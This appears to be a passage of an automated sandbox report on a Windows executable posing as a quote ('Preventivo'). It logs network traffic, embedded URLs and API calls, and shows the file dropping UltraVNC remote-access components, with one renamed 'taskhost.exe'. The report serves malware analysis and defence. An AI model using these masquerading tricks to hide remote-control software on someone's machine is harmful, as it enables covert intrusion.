Source: unknownTCP traffic detected without corresponding DNS query: 23.54.200.159
Source: unknownTCP traffic detected without corresponding DNS query: 23.54.200.159
Source: unknownTCP traffic detected without corresponding DNS query: 23.54.200.159
Source: unknownTCP traffic detected without corresponding DNS query: 23.54.200.159
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /psdk/v2/content?surfaceId=ACROBAT_READER_MASTER_SURFACEID&surfaceId=DC_READER_LAUNCH_CARD&surfaceId=DC_Reader_RHP_Banner&surfaceId=DC_Reader_RHP_Retention&surfaceId=Edit_InApp_Aug2020&surfaceId=DC_FirstMile_Right_Sec_Surface&surfaceId=DC_Reader_Upsell_Cards&surfaceId=DC_FirstMile_Home_View_Surface&surfaceId=DC_Reader_RHP_Intent_Banner&surfaceId=DC_Reader_Disc_LHP_Banner&surfaceId=DC_Reader_Edit_LHP_Banner&surfaceId=DC_Reader_Convert_LHP_Banner&surfaceId=DC_Reader_Sign_LHP_Banner&surfaceId=DC_Reader_More_LHP_Banner&surfaceId=DC_Reader_Disc_LHP_Retention&surfaceId=DC_Reader_Home_LHP_Trial_Banner&adcProductLanguage=en-us&adcVersion=23.6.20320&adcProductType=SingleClientMini&adcOSType=WIN&adcCountryCode=RO&adcXAPIClientID=api_reader_desktop_win_23.6.20320&encodingScheme=BASE_64 HTTP/1.1Host: p13n.adobe.ioConnection: keep-alivesec-ch-ua: "Chromium";v="105"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36Accept: application/json, text/javascript, */*; q=0.01x-adobe-uuid: a4ecfc44-3976-4051-8c45-0a7e26b55a37x-adobe-uuid-type: visitorIdx-api-key: AdobeReader9sec-ch-ua-platform: "Windows"Origin: https://rna-resource.acrobat.comAccept-Language: en-US,en;q=0.9Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://rna-resource.acrobat.com/Accept-Encoding: gzip, deflate, br
Source: global trafficHTTP traffic detected: GET /onboarding/smskillreader.txt HTTP/1.1Host: armmf.adobe.comConnection: keep-aliveAccept-Language: en-US,en;q=0.9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brIf-None-Match: "78-5faa31cce96da"If-Modified-Since: Mon, 01 May 2023 15:02:33 GMT
Source: global trafficHTTP traffic detected: GET /download/updates.txt HTTP/1.1Accept: */*User-Agent: AdvancedInstallerHost: www.example.comConnection: Keep-AliveCache-Control: no-cache
Source: unknownDNS traffic detected: queries for: www.example.com
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundAccept-Ranges: bytesAge: 590017Cache-Control: max-age=604800Content-Type: text/html; charset=UTF-8Date: Tue, 23 Jan 2024 11:17:59 GMTExpires: Tue, 30 Jan 2024 11:17:59 GMTLast-Modified: Tue, 16 Jan 2024 15:24:22 GMTServer: ECS (agb/52BB)Vary: Accept-EncodingX-Cache: 404-HITContent-Length: 1256Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 45 78 61 6d 70 6c 65 20 44 6f 6d 61 69 6e 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 30 66 30 66 32 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 73 79 73 74 65 6d 2d 75 69 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 22 4f 70 65 6e 20 53 61 6e 73 22 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 7d 0a 20 20 20 20 64 69 76 20 7b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 36 30 30 70 78 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 35 65 6d 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 65 6d 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 64 66 64 66 66 3b 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 30 2e 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 62 6f 78 2d 73 68 61 64 6f 77 3a 20 32 70 78 20 33 70 78 20 37 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 30 32 29 3b 0a 20 20 20 20 7d 0a 20 20 20 20 61 3a 6c 69 6e 6b 2c 20 61 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 38 34 38 38 66 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 7d 0a 20 20 20 20 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 37 30 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 64 69 76 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 2
Source: shi6E82.tmp.0.drString found in binary or memory: http://.css
Source: shi6E82.tmp.0.drString found in binary or memory: http://.jpg
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, vnchooks.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr, vnchooks.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, vnchooks.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr, vnchooks.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceCodeSigningCA.crt0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.drString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.drString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.drString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.drString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, vnchooks.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr, vnchooks.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0O
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, vnchooks.dll.0.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr, vnchooks.dll.0.drString found in binary or memory: http://crl3.digicert.com/sha2-ha-cs-g1.crl00
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, vnchooks.dll.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr, vnchooks.dll.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, vnchooks.dll.0.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr, vnchooks.dll.0.drString found in binary or memory: http://crl4.digicert.com/sha2-ha-cs-g1.crl0L
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.drString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.drString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.drString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: Preventivo24.01.11.exe, Preventivo24.01.11.exe, 00000000.00000002.1700517838.0000000000961000.00000004.00000020.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1699048395.0000000000961000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: Preventivo24.01.11.exe, Preventivo24.01.11.exe, 00000000.00000003.1699814897.0000000000923000.00000004.00000020.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000002.1700478610.0000000000924000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.0.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: Preventivo24.01.11.exe, 00000000.00000003.1659305606.0000000007DDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?31abf359f1d5f
Source: shi6E82.tmp.0.drString found in binary or memory: http://html4/loose.dtd
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0A6000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000000.1860708223.0000000000203000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.drString found in binary or memory: http://java.sun.com/products/plugin/index.html#download
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0A6000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000000.1860708223.0000000000203000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.drString found in binary or memory: http://java.sun.com/update/1.4.2/jinstall-1_4-windows-i586.cab#Version=1
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.drString found in binary or memory: http://ocsp.comodoca.com0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, vnchooks.dll.0.drString found in binary or memory: http://ocsp.digicert.com0C
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr, vnchooks.dll.0.drString found in binary or memory: http://ocsp.digicert.com0I
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, vnchooks.dll.0.drString found in binary or memory: http://ocsp.digicert.com0O
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr, vnchooks.dll.0.drString found in binary or memory: http://ocsp.digicert.com0R
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.drString found in binary or memory: http://ocsp.sectigo.com0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.drString found in binary or memory: http://ocsp.thawte.com0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, viewer.exe.0.dr, powercfg.msi.0.drString found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, viewer.exe.0.dr, powercfg.msi.0.drString found in binary or memory: http://s.symcd.com06
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, viewer.exe.0.dr, powercfg.msi.0.drString found in binary or memory: http://t1.symcb.com/ThawtePCA.crl0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, viewer.exe.0.dr, powercfg.msi.0.drString found in binary or memory: http://t2.symcb.com0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, viewer.exe.0.dr, powercfg.msi.0.drString found in binary or memory: http://tl.symcb.com/tl.crl0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, viewer.exe.0.dr, powercfg.msi.0.drString found in binary or memory: http://tl.symcb.com/tl.crt0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, viewer.exe.0.dr, powercfg.msi.0.drString found in binary or memory: http://tl.symcd.com0&
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, viewer.exe.0.dr, powercfg.msi.0.drString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, viewer.exe.0.dr, powercfg.msi.0.drString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, viewer.exe.0.dr, powercfg.msi.0.drString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, vnchooks.dll.0.drString found in binary or memory: http://www.digicert.com/CPS0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, ~.pdf.0.drString found in binary or memory: http://www.pdf-tools.com
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, viewer.exe.0.dr, powercfg.msi.0.drString found in binary or memory: https://d.symcb.com/cps0%
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, viewer.exe.0.dr, powercfg.msi.0.drString found in binary or memory: https://d.symcb.com/rpa0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, viewer.exe.0.dr, powercfg.msi.0.drString found in binary or memory: https://d.symcb.com/rpa0.
Source: taskhost.exe.0.drString found in binary or memory: https://forum.uvnc.com
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0D5000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000002.3495148727.000000000022C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.drString found in binary or memory: https://forum.uvnc.comvncMenu::WndProc
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.drString found in binary or memory: https://sectigo.com/CPS0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, viewer.exe.0.dr, powercfg.msi.0.drString found in binary or memory: https://www.advancedinstaller.com
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr, vnchooks.dll.0.drString found in binary or memory: https://www.digicert.com/CPS0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, viewer.exe.0.dr, powercfg.msi.0.drString found in binary or memory: https://www.thawte.com/cps0/
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, viewer.exe.0.dr, powercfg.msi.0.drString found in binary or memory: https://www.thawte.com/repository0W
Source: taskhost.exe.0.drString found in binary or memory: https://www.uvnc.com
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0D5000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000002.3495148727.000000000022C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.drString found in binary or memory: https://www.uvnc.comcmd
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0D5000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000002.3495148727.000000000022C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.drString found in binary or memory: https://www.uvnc.comhttps://forum.uvnc.comnet
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeFile created: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\UVncVirtualDisplay\uvncvirtualdisplay.catJump to dropped file

Spam, unwanted Advertisements and Ransom Demands

barindex
Source: C:\Games\taskhost.exeCode function: 41_2_001154D0 SystemParametersInfoA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,41_2_001154D0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_0100AD30 NtdllDefWindowProc_W,0_2_0100AD30
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00F773D0 GetSystemDirectoryW,LoadLibraryExW,NtdllDefWindowProc_W,0_2_00F773D0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00F005B0 GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,0_2_00F005B0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00E98520 SysFreeString,SysAllocString,GetWindowLongW,GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,GetWindowLongW,SetWindowTextW,GlobalAlloc,GlobalLock,GlobalUnlock,SetWindowLongW,SysFreeString,SysFreeString,0_2_00E98520
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00EAEA60 NtdllDefWindowProc_W,0_2_00EAEA60
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00E98BD0 NtdllDefWindowProc_W,0_2_00E98BD0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00EA2CE0 NtdllDefWindowProc_W,0_2_00EA2CE0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00E9ADD0 GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,DestroyWindow,0_2_00E9ADD0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00EBCDD0 NtdllDefWindowProc_W,0_2_00EBCDD0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00EA2E50 IsWindow,GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,0_2_00EA2E50
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00EA9070 GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,DeleteCriticalSection,0_2_00EA9070
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00E9B5C0 NtdllDefWindowProc_W,0_2_00E9B5C0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00F555C0 NtdllDefWindowProc_W,0_2_00F555C0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00E9BC20 NtdllDefWindowProc_W,0_2_00E9BC20
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00E97D50 GetWindowLongW,GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,GetWindowLongW,NtdllDefWindowProc_W,SetWindowTextW,GlobalAlloc,GlobalLock,GlobalUnlock,SetWindowLongW,NtdllDefWindowProc_W,0_2_00E97D50
Source: C:\Games\taskhost.exeCode function: 41_2_000CB8D0 wsprintfA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivate